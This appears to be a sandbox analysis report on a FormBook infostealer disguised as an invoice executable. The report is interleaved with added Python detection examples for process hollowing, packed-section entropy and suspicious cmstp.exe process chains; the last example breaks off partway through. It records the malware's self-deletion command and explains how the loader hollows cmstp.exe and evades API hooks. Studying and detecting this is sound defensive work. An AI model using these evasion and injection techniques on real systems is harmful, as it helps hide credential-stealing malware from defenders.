Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\cmstp.exe (command line: C:\Windows\SysWOW64\cmstp.exe)
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041B8C6
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041C12C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041CBC5
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041BBDF
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041C383
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00408C3A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00408C80
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00402D89
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041CFD2
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_0488B090
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_04931002
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_0488841F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_0487F900
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_04870D20
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_04941D55
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_04896E30
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4CBC5
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4C383
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4B8C6
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D32FB0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D38C80
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D38C3A
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D32D90
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D32D89
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0487B150 appears 32 times
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004185E0 NtCreateFile
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00418690 NtReadFile
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00418710 NtClose
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004187C0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041868A NtReadFile
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041870A NtClose
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004187BB NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9560 NtWriteFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D48690 NtReadFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D487C0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D48710 NtClose
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D485E0 NtCreateFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4868A NtReadFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D487BB NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4870A NtClose
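The cmstp.exe call inventory above is a complete process-hollowing toolkit: NtCreateProcessEx, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtSetContextThread or NtQueueApcThread, and NtResumeThread. The 0x048Bxxxx addresses sit inside the region at 0x04850000 that the wntdll.pdb entry below attributes to cmstp.exe, so the injected code is calling its own mapped copy of ntdll rather than the loaded one, which is what defeats user-mode API hooks; a sandbox tracing at a lower level still records the calls, and the order in which they occur is what a "process hollowing" verdict keys on. The following is an added example and not part of this report or of Joe Sandbox: it matches an ordered per-process call trace against that chain and reports whether the classic unmap step was seen. The two traces are constructed for the example.

```python
# Added example: order-sensitive matching of a native API trace against the
# process-hollowing chain. The traces below are constructed, not taken from the report.

# Each step is a set of acceptable call names; steps must occur in this order.
HOLLOWING_STEPS = [
    {"NtCreateProcessEx", "NtCreateUserProcess"},      # new process, typically suspended
    {"NtAllocateVirtualMemory"},                        # room for the payload image
    {"NtWriteVirtualMemory"},                           # payload copied into the target
    {"NtSetContextThread", "NtQueueApcThread"},         # execution redirected to the payload
    {"NtResumeThread"},                                 # hollowed process starts running
]


def match_chain(trace, steps=HOLLOWING_STEPS):
    """Return indices into `trace` where each step matched, in order, or None."""
    pos = 0
    hits = []
    for step in steps:
        while pos < len(trace) and trace[pos] not in step:
            pos += 1
        if pos == len(trace):
            return None
        hits.append(pos)
        pos += 1
    return hits


def analyze(trace):
    """Summarise one process's call trace: chain match plus the unmap detail."""
    hits = match_chain(trace)
    if hits is None:
        return None
    # NtUnmapViewOfSection between process creation and the first write is the
    # classic variant; loaders that skip it are still caught by the required steps.
    unmap_seen = "NtUnmapViewOfSection" in trace[hits[0]:hits[2]]
    return {"steps": hits, "unmap_seen": unmap_seen, "entry_redirect": trace[hits[3]]}


# Constructed trace in the order a hollowing loader issues the calls, with the kind
# of unrelated calls (file I/O on the payload, NtClose) that occur around them.
HOLLOWING_TRACE = [
    "NtCreateFile", "NtReadFile", "NtClose",
    "NtCreateProcessEx", "NtGetContextThread", "NtUnmapViewOfSection",
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtWriteVirtualMemory",
    "NtProtectVirtualMemory", "NtSetContextThread", "NtResumeThread", "NtClose",
]

# Constructed control: a debugger-style thread inspection uses some of the same
# calls but never creates and resumes a rewritten process.
DEBUGGER_TRACE = [
    "NtOpenProcess", "NtSuspendThread", "NtGetContextThread",
    "NtReadVirtualMemory", "NtResumeThread",
]

if __name__ == "__main__":
    print(analyze(HOLLOWING_TRACE))   # steps [3, 6, 7, 10, 11], unmap_seen True
    print(analyze(DEBUGGER_TRACE))    # None
```

The APC alternative in the fourth step covers the "Queues an APC in another process" variant of the same loader; the redirect call that matched is returned so the two variants can be distinguished in a verdict.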
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671752764.0000000000A00000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.797551448.0000000000B60000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCMSTP.EXE` vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.799092420.00000000017DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe | Virustotal: Detection: 32%
          Source: EXPORT INVOICE 2021.exe | Metadefender: Detection: 17%
          Source: EXPORT INVOICE 2021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@10/2
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671512016.0000000000932000.00000002.00020000.sdmp, EXPORT INVOICE 2021.exe, 00000002.00000002.797206646.0000000000A92000.00000002.00020000.sdmp | Binary or memory string: INSERT INTO RolPermiso(RolPermiso_rol, RolPermiso_permiso) VALUES (;Error - Nuevo - RolPermisoDAL
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: EXPORT INVOICE 2021.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXPORT INVOICE 2021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041B822 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041B82B push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041B88C push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00418AC1 push cs; retf 2_2_00418AC4
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00415AE6 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00415AF0 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004152B2 push eax; retf 2_2_004152B3
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0040861B push edi; iretd 2_2_0040861C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041CE9A push FFFFFFE5h; retf 2_2_0041CE9F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00A97A1F push esi; iretd 2_2_00A97A2E
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_00A94459 push cs; retf 2_2_00A9445C
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048CD0D1 push ecx; ret 8_2_048CD0E4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D48AC1 push cs; retf 8_2_02D48AC4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D45AF0 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D45AE6 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D452B2 push eax; retf 8_2_02D452B3
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4B88C push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4B822 push eax; ret 8_2_02D4B828
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4B82B push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4D1CA pushfd ; iretd 8_2_02D4D1CB
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4CE9A push FFFFFFE5h; retf 8_2_02D4CE9F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4BE49 push edi; iretd 8_2_02D4BE4A
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4BE75 push ebx; iretd 8_2_02D4BE76
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D3861B push edi; iretd 8_2_02D3861C
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4B7D5 push eax; ret 8_2_02D4B828
          Source: initial sample | Static PE information: section name: .text entropy: 7.07298793214
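A .text entropy of 7.07 bits per byte is well above what ordinary compiled code produces and close to the 8.0 of uniformly random data; for a .NET executable that goes on to inject a native payload into cmstp.exe, that is consistent with an encrypted blob stored inside the code section. The following is an added example, not part of this report or of Joe Sandbox, showing the calculation and a threshold check. The 7.0 cut-off and the two input buffers are assumptions made for the example, not values taken from the sample.

```python
# Added example: Shannon entropy of a PE section and a packed/encrypted verdict.
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumption: 7.0 bits/byte is a common rule-of-thumb cut-off for compressed or
# encrypted content; it is not a value taken from this report.
PACKED_THRESHOLD = 7.0


def likely_packed(entropy: float, threshold: float = PACKED_THRESHOLD) -> bool:
    return entropy >= threshold


def classify_section(name: str, data: bytes) -> dict:
    """Entropy verdict for one PE section's raw bytes."""
    h = shannon_entropy(data)
    return {"section": name, "entropy": round(h, 3), "likely_packed": likely_packed(h)}


# Constructed inputs (not bytes from the sample):
# a repeated x86 prologue/epilogue pattern standing in for ordinary compiled code ...
CODE_LIKE = bytes.fromhex("558bec83ec108b45085dc3") * 300
# ... and a uniform byte distribution standing in for an encrypted blob.
UNIFORM = bytes(range(256)) * 16

if __name__ == "__main__":
    print(classify_section(".text", CODE_LIKE))   # entropy about 3.1, not packed
    print(classify_section(".text", UNIFORM))     # entropy 8.0, packed
    print(likely_packed(7.07298793214))           # the value reported above: True
```

Real .text sections of unpacked binaries land well under the threshold because opcode and operand bytes are far from uniformly distributed; a section that scores near 8.0 while still being marked executable is worth carving and decrypting before the dynamic run, since the injected payload here is what the FormBook configuration was extracted from.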

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
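The process tree above (the sample re-launching its own image, explorer.exe starting cmstp.exe with no command line, and cmstp.exe spawning cmd.exe /c del on the original sample) and the self-deletion entry here are the parent/child chains a detection rule keys on; none of the three occurs in legitimate use of cmstp.exe, which always takes a .inf profile as an argument. The following is an added example, not part of this report or of Joe Sandbox, that runs three such rules over process-creation events shaped like Sysmon Event ID 1 fields. The events, PIDs and the benign cmstp.exe control event are constructed to mirror the tree in this report.

```python
# Added example: parent/child rules for the chains seen in this report, run over
# constructed process-creation events (Sysmon Event ID 1 style fields).
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


SAMPLE = r"C:\Users\user\Desktop\EXPORT INVOICE 2021.exe"

# Constructed events mirroring the report's process tree; PIDs and the final
# benign control event (cmstp.exe with a .inf profile) are invented for the example.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    ProcEvent(200, 100, SAMPLE, f'"{SAMPLE}"', r"C:\Windows\explorer.exe"),
    ProcEvent(201, 200, SAMPLE, f'"{SAMPLE}"', SAMPLE),
    ProcEvent(300, 100, r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(301, 300, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'", r"C:\Windows\SysWOW64\cmstp.exe"),
    ProcEvent(400, 100, r"C:\Windows\System32\cmstp.exe", r"cmstp.exe /s C:\Temp\vpn.inf", r"C:\Windows\explorer.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Strip the (possibly quoted) program token and return the remaining arguments."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end > 0 else ""
    parts = s.split(None, 1)
    return parts[1] if len(parts) > 1 else ""


DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?\.exe)['"]?(?:\s|$)""", re.I)


def detect(events):
    """Return (rule, pid, detail) findings for the three chains in this report."""
    by_pid = {e.pid: e for e in events}
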